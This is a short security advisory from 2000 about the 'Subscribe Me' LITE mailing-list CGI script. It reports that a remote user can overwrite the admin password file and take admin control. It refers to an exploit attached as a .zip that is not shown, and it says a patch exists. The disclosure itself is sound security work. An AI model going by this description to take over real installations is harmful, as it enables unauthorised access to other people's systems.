Subject: Subscribe Me Vulnerability
From: n30 (n30ALLDAS.DE)
Date: Wed Aug 23 2000 - 21:06:29 CDT


Product: Subscribe Me
Versions: ALL version numbers LITE only
OS: Unix and Winnt
Vendor: Notified, http://www.cgiscriptcenter.com/

The Problem:

    Yet again the script allows a remote user to overwrite the Admin Passwd file with
any password they see fit, thereby giving them Admin access to the Maillist Script.

Exploit:

    See the .zip file Attached

Patches:

    Already available; see the website. The download version is patched.

n30
n30alldas.de
www.alldas.de
